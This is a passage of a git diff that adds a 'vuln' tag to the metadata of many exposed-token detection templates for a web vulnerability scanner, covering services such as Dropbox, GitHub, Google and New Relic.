b/http/exposures/tokens/dropbox/dropbox-long-token.yaml index fd119f52a77..843cd3726e2 100644 --- a/http/exposures/tokens/dropbox/dropbox-long-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-long-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: dropbox,exposure,tokens + tags: dropbox,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dropbox/dropbox-short-token.yaml b/http/exposures/tokens/dropbox/dropbox-short-token.yaml index 824b1c0fe89..036849b3571 100644 --- a/http/exposures/tokens/dropbox/dropbox-short-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-short-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: dropbox,exposure,tokens + tags: dropbox,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dropbox/dropbox-token.yaml b/http/exposures/tokens/dropbox/dropbox-token.yaml index 296db2eea24..4f3963e14ab 100644 --- a/http/exposures/tokens/dropbox/dropbox-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: dropbox,exposure,tokens + tags: dropbox,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/duffel/duffel-token.yaml b/http/exposures/tokens/duffel/duffel-token.yaml index fdd5956c3d6..c9a8361ec65 100644 --- a/http/exposures/tokens/duffel/duffel-token.yaml +++ b/http/exposures/tokens/duffel/duffel-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: duffel,exposure,tokens + tags: duffel,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml b/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml index bb6fc3456d9..ad9f4e38fcf 100644 --- a/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml +++ b/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: dynatrace,token,exposure + tags: dynatrace,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/easypost/easypost-testtoken.yaml b/http/exposures/tokens/easypost/easypost-testtoken.yaml index 23a20d21351..19c4f755865 100644 --- a/http/exposures/tokens/easypost/easypost-testtoken.yaml +++ b/http/exposures/tokens/easypost/easypost-testtoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: easypost,exposure,tokens + tags: easypost,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/easypost/easypost-token.yaml b/http/exposures/tokens/easypost/easypost-token.yaml index 2b184e1e8bb..9d668756de0 100644 --- a/http/exposures/tokens/easypost/easypost-token.yaml +++ b/http/exposures/tokens/easypost/easypost-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: easypost,exposure,tokens + tags: easypost,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/elastic/elastic-cloud-api-key.yaml b/http/exposures/tokens/elastic/elastic-cloud-api-key.yaml index 002fd4bf9d4..f95941f60a0 100644 --- a/http/exposures/tokens/elastic/elastic-cloud-api-key.yaml +++ b/http/exposures/tokens/elastic/elastic-cloud-api-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: elastic,exposure,tokens + tags: elastic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/etsy/etsy-accesstoken.yaml b/http/exposures/tokens/etsy/etsy-accesstoken.yaml index 88ccc3c8286..5341f65366d 100644 --- a/http/exposures/tokens/etsy/etsy-accesstoken.yaml +++ b/http/exposures/tokens/etsy/etsy-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: etsy,exposure,tokens,accesskey + tags: etsy,exposure,tokens,accesskey,vuln http: - method: GET diff --git a/http/exposures/tokens/facebook/facebook-access-token.yaml b/http/exposures/tokens/facebook/facebook-access-token.yaml index 6b4a8a24b20..a53d722ea72 100644 --- a/http/exposures/tokens/facebook/facebook-access-token.yaml +++ b/http/exposures/tokens/facebook/facebook-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: facebook,token,exposure + tags: facebook,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/facebook/facebook-token.yaml b/http/exposures/tokens/facebook/facebook-token.yaml index 28716f65197..e3b06fe93d4 100644 --- a/http/exposures/tokens/facebook/facebook-token.yaml +++ b/http/exposures/tokens/facebook/facebook-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: facebook,exposure,tokens + tags: facebook,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/fastly/fastly-token.yaml b/http/exposures/tokens/fastly/fastly-token.yaml index 8f13cfab973..2418fcf1ea1 100644 --- a/http/exposures/tokens/fastly/fastly-token.yaml +++ b/http/exposures/tokens/fastly/fastly-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: fastly,exposure,tokens + tags: fastly,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/figma/figma-personal-token.yaml b/http/exposures/tokens/figma/figma-personal-token.yaml index f1e1abc60dc..2609adbe426 100644 --- a/http/exposures/tokens/figma/figma-personal-token.yaml +++ b/http/exposures/tokens/figma/figma-personal-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: figma,exposure,token + tags: figma,exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/finicity/finicity-clientsecret.yaml b/http/exposures/tokens/finicity/finicity-clientsecret.yaml index 3cac28a705d..cc24e73cde0 100644 --- a/http/exposures/tokens/finicity/finicity-clientsecret.yaml +++ b/http/exposures/tokens/finicity/finicity-clientsecret.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,finicity,file,token + tags: exposure,finicity,file,token,vuln http: - method: GET diff --git a/http/exposures/tokens/finicity/finicity-token.yaml b/http/exposures/tokens/finicity/finicity-token.yaml index f579293b2e6..22cc34d5b19 100644 --- a/http/exposures/tokens/finicity/finicity-token.yaml +++ b/http/exposures/tokens/finicity/finicity-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,finicity,file,token + tags: exposure,finicity,file,token,vuln http: - method: GET diff --git a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml index d55a380358c..e84f33fe124 100644 --- a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml +++ b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,finnhub,file,token + tags: exposure,finnhub,file,token,vuln http: - method: GET diff --git a/http/exposures/tokens/flickr/flickr-accesstoken.yaml b/http/exposures/tokens/flickr/flickr-accesstoken.yaml index 2db0318390c..59fbda678c1 100644 --- a/http/exposures/tokens/flickr/flickr-accesstoken.yaml +++ b/http/exposures/tokens/flickr/flickr-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: flickr,exposure,tokens + tags: flickr,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml b/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml index 1004078d7ea..cfa55ba6f4c 100644 --- a/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: flutterwave,exposure,tokens,encryption + tags: flutterwave,exposure,tokens,encryption,vuln http: - method: GET diff --git a/http/exposures/tokens/flutter/flutterwave-publickey.yaml b/http/exposures/tokens/flutter/flutterwave-publickey.yaml index 293a5fe0233..1126a0b5d0b 100644 --- a/http/exposures/tokens/flutter/flutterwave-publickey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-publickey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: flutterwave,exposure,tokens,publickey + tags: flutterwave,exposure,tokens,publickey,vuln http: - method: GET diff --git a/http/exposures/tokens/flutter/flutterwave-secretkey.yaml b/http/exposures/tokens/flutter/flutterwave-secretkey.yaml index 5a0e21a58af..14dee036c30 100644 --- a/http/exposures/tokens/flutter/flutterwave-secretkey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-secretkey.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: flutterwave,exposure,tokens,secretkey + tags: flutterwave,exposure,tokens,secretkey,vuln http: - method: GET diff --git a/http/exposures/tokens/frameio/frameio-token.yaml b/http/exposures/tokens/frameio/frameio-token.yaml index ff7b9771aac..b7dd53bcb40 100644 --- a/http/exposures/tokens/frameio/frameio-token.yaml +++ b/http/exposures/tokens/frameio/frameio-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: frameio,exposure,tokens + tags: frameio,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml b/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml index 82a37777071..02b85785311 100644 --- a/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml +++ b/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: freshbooks,exposure,tokens + tags: freshbooks,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/generic/credentials-disclosure.yaml b/http/exposures/tokens/generic/credentials-disclosure.yaml index bc9a9a074bc..ccc68014205 100644 --- a/http/exposures/tokens/generic/credentials-disclosure.yaml +++ b/http/exposures/tokens/generic/credentials-disclosure.yaml @@ -7,7 +7,7 @@ info: description: Look for keys/tokens/passwords in HTTP responses, exposed keys/tokens/secrets requires manual verification for impact evaluation. metadata: max-request: 1 - tags: exposure,token,key,api,secret,password,generic + tags: exposure,token,key,api,secret,password,generic,vuln # Example cases to match against: https://regex101.com/r/HPtaU2/1 http: diff --git a/http/exposures/tokens/generic/general-tokens.yaml b/http/exposures/tokens/generic/general-tokens.yaml index f2b67b74cc7..f12dc456ade 100644 --- a/http/exposures/tokens/generic/general-tokens.yaml +++ b/http/exposures/tokens/generic/general-tokens.yaml @@ -6,7 +6,7 @@ info: severity: unknown metadata: max-request: 1 - tags: exposure,token,generic + tags: exposure,token,generic,vuln http: - method: GET diff --git a/http/exposures/tokens/generic/jdbc-connection-string.yaml b/http/exposures/tokens/generic/jdbc-connection-string.yaml index bf6053044f4..0e192dd7ec7 100755 --- a/http/exposures/tokens/generic/jdbc-connection-string.yaml +++ b/http/exposures/tokens/generic/jdbc-connection-string.yaml @@ -6,7 +6,7 @@ info: severity: unknown metadata: max-request: 1 - tags: exposure,token,generic + tags: exposure,token,generic,vuln http: - method: GET diff --git a/http/exposures/tokens/generic/jwt-token.yaml b/http/exposures/tokens/generic/jwt-token.yaml index 04d53cc11ad..84a11291f9f 100644 --- a/http/exposures/tokens/generic/jwt-token.yaml +++ b/http/exposures/tokens/generic/jwt-token.yaml @@ -6,7 +6,7 @@ info: severity: unknown metadata: max-request: 1 - tags: exposure,token,generic + tags: exposure,token,generic,vuln http: - method: GET diff --git a/http/exposures/tokens/generic/shoppable-token.yaml b/http/exposures/tokens/generic/shoppable-token.yaml index ad69b7f5c92..f43c5ac1656 100644 --- a/http/exposures/tokens/generic/shoppable-token.yaml +++ b/http/exposures/tokens/generic/shoppable-token.yaml @@ -8,7 +8,7 @@ info: - https://ask.shoppable.com/knowledge/quick-start-api-guide metadata: max-request: 1 - tags: exposure,shoppable,token,auth,service,generic + tags: exposure,shoppable,token,auth,service,generic,vuln http: - method: GET diff --git a/http/exposures/tokens/github/github-app.yaml b/http/exposures/tokens/github/github-app.yaml index 9888184a433..f90f2ed8c17 100644 --- a/http/exposures/tokens/github/github-app.yaml +++ b/http/exposures/tokens/github/github-app.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: github,app,token,exposure + tags: github,app,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/github/github-oauth-access.yaml b/http/exposures/tokens/github/github-oauth-access.yaml index 6feebe2cc6f..31d8ff2cc17 100644 --- a/http/exposures/tokens/github/github-oauth-access.yaml +++ b/http/exposures/tokens/github/github-oauth-access.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: github,oauth,token,exposure + tags: github,oauth,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/github/github-personal-access.yaml b/http/exposures/tokens/github/github-personal-access.yaml index 52db19c3c15..733326154bf 100644 --- a/http/exposures/tokens/github/github-personal-access.yaml +++ b/http/exposures/tokens/github/github-personal-access.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: github,token,exposure + tags: github,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/github/github-refresh.yaml b/http/exposures/tokens/github/github-refresh.yaml index 52d6ddb45b8..561be8521be 100644 --- a/http/exposures/tokens/github/github-refresh.yaml +++ b/http/exposures/tokens/github/github-refresh.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: github,refresh,token,exposure + tags: github,refresh,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/gitlab/gitlab-personal-token.yaml b/http/exposures/tokens/gitlab/gitlab-personal-token.yaml index 752aaa7bb29..0ea7c98080a 100644 --- a/http/exposures/tokens/gitlab/gitlab-personal-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-personal-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: gitlab,token,exposure + tags: gitlab,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml b/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml index 901f1543867..01a23109f96 100644 --- a/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: gitlab,token,exposure + tags: gitlab,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/gitlab/gitlab-runner-token.yaml b/http/exposures/tokens/gitlab/gitlab-runner-token.yaml index 4896ad03f8c..8faf5feebc2 100644 --- a/http/exposures/tokens/gitlab/gitlab-runner-token.yaml +++ b/http/exposures/tokens/gitlab/gitlab-runner-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: gitlab,runner,token,exposure + tags: gitlab,runner,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/gitter/gitter-token.yaml b/http/exposures/tokens/gitter/gitter-token.yaml index 5535969776f..a40e77b0eaa 100644 --- a/http/exposures/tokens/gitter/gitter-token.yaml +++ b/http/exposures/tokens/gitter/gitter-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,gitter,file,keys + tags: exposure,gitter,file,keys,vuln http: - method: GET diff --git a/http/exposures/tokens/gocardless/gocardless-token.yaml b/http/exposures/tokens/gocardless/gocardless-token.yaml index 90f854671b0..47265b81cd4 100644 --- a/http/exposures/tokens/gocardless/gocardless-token.yaml +++ b/http/exposures/tokens/gocardless/gocardless-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: gocardless,exposure,tokens + tags: gocardless,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/google/fcm-server-key.yaml b/http/exposures/tokens/google/fcm-server-key.yaml index f9b4c77ff94..5af34d65469 100644 --- a/http/exposures/tokens/google/fcm-server-key.yaml +++ b/http/exposures/tokens/google/fcm-server-key.yaml @@ -9,7 +9,7 @@ info: - https://abss.me/posts/fcm-takeover metadata: max-request: 1 - tags: exposure,token,google + tags: exposure,token,google,vuln http: - method: GET diff --git a/http/exposures/tokens/google/google-api-key.yaml b/http/exposures/tokens/google/google-api-key.yaml index 05107c99f4e..d621f7caec1 100644 --- a/http/exposures/tokens/google/google-api-key.yaml +++ b/http/exposures/tokens/google/google-api-key.yaml @@ -9,7 +9,7 @@ info: - https://support.google.com/googleapi/answer/6310037 metadata: max-request: 2 - tags: exposure,token,google + tags: exposure,token,google,vuln http: - method: GET diff --git a/http/exposures/tokens/google/google-calendar-link.yaml b/http/exposures/tokens/google/google-calendar-link.yaml index 217533b925a..31d0ac8be88 100755 --- a/http/exposures/tokens/google/google-calendar-link.yaml +++ b/http/exposures/tokens/google/google-calendar-link.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,google + tags: exposure,token,google,vuln http: - method: GET diff --git a/http/exposures/tokens/google/google-client-id.yaml b/http/exposures/tokens/google/google-client-id.yaml index a8797cd5302..cc1cac0cb15 100644 --- a/http/exposures/tokens/google/google-client-id.yaml +++ b/http/exposures/tokens/google/google-client-id.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: google,token,exposure + tags: google,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/google/google-oauth-prefixed.yaml b/http/exposures/tokens/google/google-oauth-prefixed.yaml index 14cd095423c..68c1be37b22 100644 --- a/http/exposures/tokens/google/google-oauth-prefixed.yaml +++ b/http/exposures/tokens/google/google-oauth-prefixed.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: google,token,exposure + tags: google,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/google/oauth-access-key.yaml b/http/exposures/tokens/google/oauth-access-key.yaml index b1703ddf174..5ad41c56904 100755 --- a/http/exposures/tokens/google/oauth-access-key.yaml +++ b/http/exposures/tokens/google/oauth-access-key.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,google + tags: exposure,token,google,vuln http: - method: GET diff --git a/http/exposures/tokens/grafana/grafana-cloud-token.yaml b/http/exposures/tokens/grafana/grafana-cloud-token.yaml index fba8a2edf82..fc16460b000 100644 --- a/http/exposures/tokens/grafana/grafana-cloud-token.yaml +++ b/http/exposures/tokens/grafana/grafana-cloud-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: grafana,exposure,tokens + tags: grafana,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/grafana/grafana-key.yaml b/http/exposures/tokens/grafana/grafana-key.yaml index eb73bf7a71f..0a25b1a8033 100644 --- a/http/exposures/tokens/grafana/grafana-key.yaml +++ b/http/exposures/tokens/grafana/grafana-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: grafana,exposure,tokens + tags: grafana,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml b/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml index 914b9d90c18..b666b1576c5 100644 --- a/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml +++ b/http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: grafana,exposure,tokens + tags: grafana,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/hashicorp/hashicorp-token.yaml b/http/exposures/tokens/hashicorp/hashicorp-token.yaml index 7fa37d7c4c8..5becd427bf8 100644 --- a/http/exposures/tokens/hashicorp/hashicorp-token.yaml +++ b/http/exposures/tokens/hashicorp/hashicorp-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: hashicorp,exposure,tokens + tags: hashicorp,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/heroku/heroku-api-key.yaml b/http/exposures/tokens/heroku/heroku-api-key.yaml index 3b351904710..e114b17fc5e 100644 --- a/http/exposures/tokens/heroku/heroku-api-key.yaml +++ b/http/exposures/tokens/heroku/heroku-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: heroku,token,exposure + tags: heroku,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/heroku/heroku-oauth2-token.yaml b/http/exposures/tokens/heroku/heroku-oauth2-token.yaml index a187fc4f540..0e5858a394b 100644 --- a/http/exposures/tokens/heroku/heroku-oauth2-token.yaml +++ b/http/exposures/tokens/heroku/heroku-oauth2-token.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: heroku,token,exposure + tags: heroku,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/huggingface/huggingface-user-access-token.yaml b/http/exposures/tokens/huggingface/huggingface-user-access-token.yaml index 40c9bcf9934..bcb7c401a44 100644 --- a/http/exposures/tokens/huggingface/huggingface-user-access-token.yaml +++ b/http/exposures/tokens/huggingface/huggingface-user-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: huggingface,exposure,tokens + tags: huggingface,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml b/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml index c97495a4809..0cd15530579 100644 --- a/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml +++ b/http/exposures/tokens/jenkins/jenkins-crumb-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: jenkins,crumb,token,exposure + tags: jenkins,crumb,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/jotform/jotform-api-key.yaml b/http/exposures/tokens/jotform/jotform-api-key.yaml index c46a499d450..81e3e4f5cf1 100644 --- a/http/exposures/tokens/jotform/jotform-api-key.yaml +++ b/http/exposures/tokens/jotform/jotform-api-key.yaml @@ -9,7 +9,7 @@ info: metadata: verified: "true" max-request: 1 - tags: token,exposure,jotform + tags: token,exposure,jotform,vuln http: - method: GET diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 847c90d5ddc..b97ada07def 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -16,7 +16,7 @@ info: vendor: jwt_project product: jwt shodan-query: html:"jwks.json" - tags: exposure,token,generic + tags: exposure,token,generic,vuln http: - method: GET diff --git a/http/exposures/tokens/linkedin/linkedin-client-id.yaml b/http/exposures/tokens/linkedin/linkedin-client-id.yaml index 95fd17e035d..616483ccf58 100644 --- a/http/exposures/tokens/linkedin/linkedin-client-id.yaml +++ b/http/exposures/tokens/linkedin/linkedin-client-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: linkedin,exposure,tokens + tags: linkedin,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/linkedin/linkedin-secret-key.yaml b/http/exposures/tokens/linkedin/linkedin-secret-key.yaml index 2a5e85cece4..8ea9acda17e 100644 --- a/http/exposures/tokens/linkedin/linkedin-secret-key.yaml +++ b/http/exposures/tokens/linkedin/linkedin-secret-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: linkedin,exposure,tokens + tags: linkedin,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/loqate/loqate-api-key.yaml b/http/exposures/tokens/loqate/loqate-api-key.yaml index d17e4aac238..6b59c7eb8aa 100644 --- a/http/exposures/tokens/loqate/loqate-api-key.yaml +++ b/http/exposures/tokens/loqate/loqate-api-key.yaml @@ -9,7 +9,7 @@ info: - https://www.loqate.com/en-gb/home/ metadata: max-request: 1 - tags: exposure,token,loqate + tags: exposure,token,loqate,vuln http: - method: GET diff --git a/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml b/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml index 88bcf65ed7d..12a2577e534 100644 --- a/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml +++ b/http/exposures/tokens/mailchimp/mailchimp-api-key.yaml @@ -8,7 +8,7 @@ info: - https://mailchimp.com/help/about-api-keys/ metadata: max-request: 1 - tags: exposure,token,mailchimp + tags: exposure,token,mailchimp,vuln http: - method: GET diff --git a/http/exposures/tokens/mailgun/mailgun-api-token.yaml b/http/exposures/tokens/mailgun/mailgun-api-token.yaml index a8de8a6a094..bd5e07aa742 100644 --- a/http/exposures/tokens/mailgun/mailgun-api-token.yaml +++ b/http/exposures/tokens/mailgun/mailgun-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: mailgun,token,exposure + tags: mailgun,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml index 018c9a2e86a..971b7fc24b1 100644 --- a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml +++ b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: token,exposure,mapbox + tags: token,exposure,mapbox,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml b/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml index 22436821bb3..0698528445a 100755 --- a/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml +++ b/http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml @@ -8,7 +8,7 @@ info: - https://docs.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/what-are-webhooks-and-connectors metadata: max-request: 1 - tags: exposure,token,microsoft + tags: exposure,token,microsoft,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml index 9435f70286b..82f42372f93 100644 --- a/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml @@ -8,7 +8,7 @@ info: - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#admin-keys metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-api-service-key.yaml b/http/exposures/tokens/newrelic/newrelic-api-service-key.yaml index 6a49315e7c6..2b985989bd2 100644 --- a/http/exposures/tokens/newrelic/newrelic-api-service-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-api-service-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: newrelic,exposure,tokens + tags: newrelic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-insights-key.yaml b/http/exposures/tokens/newrelic/newrelic-insights-key.yaml index f471399870d..dd3feb7875c 100644 --- a/http/exposures/tokens/newrelic/newrelic-insights-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-insights-key.yaml @@ -8,7 +8,7 @@ info: - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#insights-insert-key metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-license-key-non.yaml b/http/exposures/tokens/newrelic/newrelic-license-key-non.yaml index 8c6a9f8bc23..5d112bb8fb5 100644 --- a/http/exposures/tokens/newrelic/newrelic-license-key-non.yaml +++ b/http/exposures/tokens/newrelic/newrelic-license-key-non.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: newrelic,exposure,tokens + tags: newrelic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-license-key.yaml b/http/exposures/tokens/newrelic/newrelic-license-key.yaml index 49e8f6e82d8..17d90a68905 100644 --- a/http/exposures/tokens/newrelic/newrelic-license-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-license-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: newrelic,exposure,tokens + tags: newrelic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml index 8a45d8e69de..0a4aa707e31 100644 --- a/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: newrelic,pixie,token,exposure + tags: newrelic,pixie,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml b/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml index d420a82df83..e562b65895b 100644 --- a/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: newrelic,pixie,token,exposure + tags: newrelic,pixie,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml b/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml index ff50113d7b4..0aa037dd9fd 100644 --- a/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml @@ -8,7 +8,7 @@ info: - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#rest-api-key metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml b/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml index dc9f424675e..4bf155d0aca 100644 --- a/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml +++ b/http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml @@ -6,7 +6,7 @@ info: 